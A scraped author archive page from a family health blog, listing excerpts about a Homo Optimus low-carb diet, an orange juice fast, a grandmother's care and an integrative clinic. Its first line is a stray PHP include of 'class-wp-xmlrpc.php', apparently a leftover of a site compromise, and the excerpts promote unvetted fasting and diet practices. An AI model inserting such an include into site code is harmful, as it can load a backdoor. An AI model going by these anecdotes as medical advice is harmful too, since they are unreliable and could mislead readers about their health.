@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 188 of 235

Author: Good Samaritan

Trying to eat enough fats for Homo Optimus Diet proportions

I decided to try to find enough fats without the aid of eggs this week for this low carb high fat diet I’m on.  Plain, unseasoned pork tastes bland.  I like beef better.  But I can see one can go on Homo Optimus Diet on commercial foods.  Say in...

My grandma was looking for epsom salts to dip her legs in

Odd text message from my grandma’s nannie the other day.  She said she was in the Cubao area and needed to know where to buy epsom salts.  So I told her the epsom salts were either in Healthy Options in the malls or in the factory at Alysons Chemicals....

All out experiment on Homo Optimus Diet

The Optimal Diet is a dietary model of human nutrition devised and implemented by Dr. Jan Kwasniewski of Poland more than 30 years ago. After my 3 day orange juice fast, having reset my innards, I’m ready to test the Homo Optimus Diet in earnest. The concept is very...

Rogelio D. Salindong, M.D. FCOM – Klinika Biologica

Klinika Biologica is a center for Biological and Integrative Medicine. Seems to be one of those MDs who studied beyond their industry because there is such a big demand for non-surgical ways of beating diseases, and there are better and more effective ways as well. Dr. Salindong offers: IV...

Grandma’s Sister Takes my grandma to her cardiologist

In the emergency room in the Heart Center, the ER doc suggested my grandma seek the advice of a consultant afterwards. My grandma cancelled twice with an appointment to send her to our doctor Dr. Divina Hey-Gonzales. Just today, my grandma accepted the offer of her sister to have...

Little girl’s instinct for sun, bathing, play and nutrition

For the past 3 times this week I’ve observed how my 3 year old little girl knows how to have a grand time by herself. She asks for her own bath to be drawn outside in the laundry area where she gets to sun herself at the same time...